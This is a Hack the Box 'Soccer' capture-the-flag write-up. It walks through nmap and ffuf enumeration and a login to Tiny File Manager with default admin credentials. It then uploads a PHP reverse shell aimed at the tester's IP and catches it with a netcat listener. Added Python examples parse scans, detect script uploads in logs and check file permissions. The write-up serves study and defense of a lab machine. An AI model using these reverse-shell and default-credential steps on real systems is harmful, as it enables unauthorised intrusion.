Hack the Box – Soccer

date: Apr 7, 2023
slug: htb-soccer
author:
status: Public
tags: Capture the Flag, WebApp Test
summary: An easy machine that uses basic web app enumeration, as well as CMS exploitation and reverse shell.
type: Post
thumbnail: Soccer (Custom) (4).png
category: Security
updatedAt: Apr 7, 2023 06:55 AM

⚠️ NOTE: the following is very WIP/incomplete, will be edited and continued later. This is just my basic thoughts as I run through the challenge.
IP for this box is 10.10.11.194
start with an nmap scan
└─$ sudo nmap -sC -sV -T4 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 01:10 EDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 01:10 (0:00:12 remaining)
Nmap scan report for 10.10.11.194
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_  256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Fri, 07 Apr 2023 05:10:27 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Fri, 07 Apr 2023 05:10:27 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.93%I=7%D=4/7%Time=642FA5BF%P=x86_64-pc-linux-gnu%r(inf
SF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x2
SF:0close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\n
SF:Content-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCon
SF:tent-Length:\x20139\r\nDate:\x20Fri,\x2007\x20Apr\x202023\x2005:10:27\x
SF:20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=
SF:\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</h
SF:ead>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HTT
SF:POptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Poli
SF:cy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r
SF:\nDate:\x20Fri,\x2007\x20Apr\x202023\x2005:10:27\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<met
SF:a\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Ca
SF:nnot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HTT
SF:P/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-sr
SF:c\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20t
SF:ext/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\x
SF:2007\x20Apr\x202023\x2005:10:27\x20GMT\r\nConnection:\x20close\r\n\r\n<
SF:!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"ut
SF:f-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x
SF:20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r
SF:(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnecti
SF:on:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,2F,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nConnection:\x20close\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.52 seconds
open ports:
  • 22 | ssh
  • 80 | http
  • 9091 | xmltec-xmlmail?
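As an added example (not from the original post), the following Python parses the normal-format nmap output above into a list of open ports and pulls out the virtual-host name leaked by the http-title redirect, which is the fact the /etc/hosts step relies on. The sample text is an abridged copy of the scan output; the function names are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample: an abridged copy of the nmap normal-format output shown above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.11.194
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 404 Not Found
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "report for name (ip)" when reverse DNS resolved, otherwise "report for ip"
HOST_LINE = re.compile(r"^Nmap scan report for (?P<a>\S+)(?: \((?P<b>[^)]+)\))?")
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)
REDIRECT = re.compile(r"Did not follow redirect to (?P<url>\S+)")


def parse_nmap(text):
    """Parse nmap 'normal' output into host, port table and any hostnames it leaks."""
    result = {"host": None, "ports": [], "hostnames": []}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            if m.group("b"):
                result["host"] = m.group("b")
                result["hostnames"].append(m.group("a"))
            else:
                result["host"] = m.group("a")
            continue
        m = PORT_LINE.match(line)
        if m:
            service = m.group("service")
            result["ports"].append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                # nmap appends '?' when the service name is only a guess
                "service": service.rstrip("?"),
                "guessed": service.endswith("?"),
                "version": (m.group("version") or "").strip(),
            })
            continue
        m = REDIRECT.search(line)
        if m:
            # A redirect to a virtual host is how we learn the name to put in /etc/hosts.
            host = urlparse(m.group("url")).hostname
            if host and host not in result["hostnames"]:
                result["hostnames"].append(host)
    return result


def open_ports(parsed):
    return [p for p in parsed["ports"] if p["state"] == "open"]


def hosts_entries(parsed):
    """One /etc/hosts line per hostname the scan leaked."""
    return [f"{parsed['host']} {name}" for name in parsed["hostnames"]]


if __name__ == "__main__":
    info = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for p in open_ports(info):
        flag = " (guessed)" if p["guessed"] else ""
        print(f"{p['port']}/{p['proto']} {p['service']}{flag} {p['version']}")
    print("\n".join(hosts_entries(info)))
```

The "guessed" flag matters in practice: 9091 is only labelled xmltec-xmlmail because nmap matched a name to the port number, while the fingerprint text shows a plain HTTP server returning a Node-style "Cannot GET /" error, so the label should not be trusted without looking at the banner.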
 
go to the website
sudo nano /etc/hosts
add the following line at the end (10.10.11.194 is the box, soccer.htb is the hostname the nmap redirect pointed at)
10.10.11.194 soccer.htb
now we have access to the website
didn't find anything interesting on the website or in the page source
Let's try brute forcing directories. I'll use ffuf with the SecLists raft-medium directories word list:
$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://soccer.htb/FUZZ
it found a directory called "tiny"
going to http://soccer.htb/tiny/ shows the following page
the login page is using tinyfilemanager from the following GitHub project: prasathmani/tinyfilemanager
Looking at the GitHub documentation for it, the default username and passwords are
Default username/password: admin/admin@123 and user/12345.
admin/admin@123 works. Seems the admin credentials were left as default.
 
After looking around, I found out you can upload to different parts of the webpage by going to that directory/page and clicking the upload button on the top right.
In the “tiny” directory, there’s a directory called “upload” in which I can upload items.
Thinking for a bit, I'll then download the PHP reverse shell from pentestmonkey.
After that, I edit the PHP reverse shell file that I just downloaded.
I change the default IP to my IP, which is 10.10.14.63; I don't need to actually change the port in this scenario.
I upload the php-reverse-shell.php file to /var/www/html/tiny/uploads
I have the file on the server now
Since I kept the port as the default, I'll use the following command
nc -nvlp 1234
While listening on that port, I'll open the php-reverse-shell
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.63] from (UNKNOWN) [10.10.11.194] 37406
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 06:03:50 up  1:06,  0 users,  load average: 0.07, 0.03, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
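From the defender's side, the two events in this chain worth alerting on are a script file being requested from the file manager's upload directory, and that request following a login to the manager from the same client. The Python below is an added example (not from the post and not part of Tiny File Manager) that runs that check over nginx combined-format access-log lines. The paths /tiny/ and /tiny/uploads/ come from the write-up; the log lines themselves are constructed, and the function names are assumptions.

```python
import re
from datetime import datetime, timedelta
from pathlib import PurePosixPath

# Constructed nginx combined-format log lines (not captured from the box). The
# paths mirror the write-up: the file manager lives under /tiny/ and writes
# uploads to /tiny/uploads/.
SAMPLE_ACCESS_LOG = """\
10.10.14.63 - - [07/Apr/2023:05:55:01 +0000] "GET /tiny/ HTTP/1.1" 200 5312 "-" "Mozilla/5.0"
10.10.14.63 - - [07/Apr/2023:05:55:20 +0000] "POST /tiny/ HTTP/1.1" 302 0 "http://soccer.htb/tiny/" "Mozilla/5.0"
10.10.14.63 - - [07/Apr/2023:05:58:11 +0000] "GET /tiny/uploads/logo.png HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.10.14.63 - - [07/Apr/2023:06:03:50 +0000] "GET /tiny/uploads/php-reverse-shell.php HTTP/1.1" 499 0 "-" "Mozilla/5.0"
10.10.14.99 - - [07/Apr/2023:06:10:00 +0000] "GET /tiny/uploads/team.php.jpg HTTP/1.1" 200 412 "-" "curl/7.88"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".php3", ".php5", ".php7"}
UPLOAD_PREFIXES = ("/tiny/uploads/",)
MANAGER_LOGIN_PATH = "/tiny/"   # a POST here is the file manager's login form


def parse_line(line):
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string
    rec["status"] = int(rec["status"])
    return rec


def is_script_in_upload_dir(path):
    """True when a path under an upload directory carries a script extension anywhere
    in its name; .suffixes catches double extensions such as shell.php.jpg too."""
    in_upload = any(path.startswith(prefix) for prefix in UPLOAD_PREFIXES)
    return in_upload and any(s.lower() in SCRIPT_EXTS for s in PurePosixPath(path).suffixes)


def find_suspicious(lines, window=timedelta(minutes=30)):
    """Flag script requests under the upload dir and note whether the same client
    logged in to the file manager within `window` beforehand."""
    records = [r for r in map(parse_line, lines) if r]
    logins = [(r["ip"], r["ts"]) for r in records
              if r["method"] == "POST" and r["path"] == MANAGER_LOGIN_PATH]
    alerts = []
    for r in records:
        if not is_script_in_upload_dir(r["path"]):
            continue
        seen = any(ip == r["ip"] and timedelta(0) <= r["ts"] - ts <= window
                   for ip, ts in logins)
        alerts.append({"ip": r["ip"], "ts": r["ts"].isoformat(), "path": r["path"],
                       "status": r["status"], "manager_login_seen": seen})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_ACCESS_LOG.splitlines()):
        print(alert)
```

Detection is the fallback; the fix is to never serve uploads as code: keep the upload directory outside the web root, or configure nginx so PHP is not executed for anything under /tiny/uploads/, and replace the default admin/admin@123 credentials, which is what made the upload possible in the first place.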
Using the following, I'll dig through to find anything of use
python3 -c "import pty;pty.spawn('/bin/bash');"
$ python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@soccer:/$ pwd
pwd
/
www-data@soccer:/$ ls
ls
bin   dev   lib    libx32      mnt   root  snap  tmp      var
boot  etc   lib32  lost+found  opt   run   srv   usr
data  home  lib64  media       proc  sbin  sys   vagrant
www-data@soccer:/$ whoami
whoami
www-data
www-data@soccer:/$ cd home      
cd home
www-data@soccer:/home$ ls
ls
player
www-data@soccer:/home$ cd player
cd player
www-data@soccer:/home/player$ ls
ls
user.txt
www-data@soccer:/home/player$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@soccer:/home/player$ ls -la
ls -la
total 28
drwxr-xr-x 3 player player 4096 Nov 28 22:12 .
drwxr-xr-x 3 root   root   4096 Nov 17 09:25 ..
lrwxrwxrwx 1 root   root      9 Nov 17 09:02 .bash_history -> /dev/null
-rw-r--r-- 1 player player  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 player player 3771 Feb 25  2020 .bashrc
drwx------ 2 player player 4096 Nov 17 09:00 .cache
-rw-r--r-- 1 player player  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 Nov 17 09:02 .viminfo -> /dev/null
-rw-r----- 1 root   player   33 Apr  7 04:58 user.txt
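To make the "Permission denied" concrete, here is an added Python example (not part of the write-up) that parses the ls -la listing above and applies the classic owner/group/other check for a given user: user.txt is mode -rw-r----- owned by root with group player, so www-data, who is neither, gets no read bit, while player reads it through the group bits. The listing is copied from the output above; the function names are assumptions.

```python
import re
from typing import NamedTuple


class Entry(NamedTuple):
    mode: str      # e.g. "-rw-r-----"
    owner: str
    group: str
    name: str
    target: str    # symlink target, "" when the entry is not a symlink


# Copied from the `ls -la` output above; the "total 28" line is skipped by the parser.
SAMPLE_LISTING = """\
total 28
drwxr-xr-x 3 player player 4096 Nov 28 22:12 .
drwxr-xr-x 3 root   root   4096 Nov 17 09:25 ..
lrwxrwxrwx 1 root   root      9 Nov 17 09:02 .bash_history -> /dev/null
-rw-r--r-- 1 player player  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 player player 3771 Feb 25  2020 .bashrc
drwx------ 2 player player 4096 Nov 17 09:00 .cache
-rw-r--r-- 1 player player  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 Nov 17 09:02 .viminfo -> /dev/null
-rw-r----- 1 root   player   33 Apr  7 04:58 user.txt
"""

# mode (optionally followed by + . or @ for ACL/xattr), link count, owner, group,
# size, three date tokens, then the name (which may carry " -> target")
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})[+.@]?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<name>.+)$"
)


def parse_listing(text):
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        name, _, target = m.group("name").partition(" -> ")
        entries.append(Entry(m.group("mode"), m.group("owner"), m.group("group"), name, target))
    return entries


def can_read(entry, user, groups):
    """Classic Unix DAC: root bypasses the bits; otherwise exactly one class applies,
    chosen in the order owner, group, other (an owner without 'r' is denied even if
    'other' has it). ACLs, capabilities and MAC are not modelled."""
    if user == "root":
        return True
    bits = entry.mode[1:]          # drop the file-type character
    if user == entry.owner:
        cls = bits[0:3]
    elif entry.group in groups:
        cls = bits[3:6]
    else:
        cls = bits[6:9]
    return "r" in cls


def readable_by(entries, user, groups):
    """Names in the listing that `user` (with supplementary `groups`) can read."""
    return [e.name for e in entries if can_read(e, user, groups)]


def explain(entry, user, groups):
    verdict = "can" if can_read(entry, user, groups) else "cannot"
    return (f"{user} {verdict} read {entry.name}: mode {entry.mode}, "
            f"owner {entry.owner}, group {entry.group}")


if __name__ == "__main__":
    listing = parse_listing(SAMPLE_LISTING)
    for who, grp in (("www-data", {"www-data"}), ("player", {"player"})):
        print(explain(listing[-1], who, grp))
```

The same check tells you what the web server account should not have been able to reach in the first place: a www-data shell reading the player home directory at all is a sign the application account has more filesystem visibility than it needs.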
 
 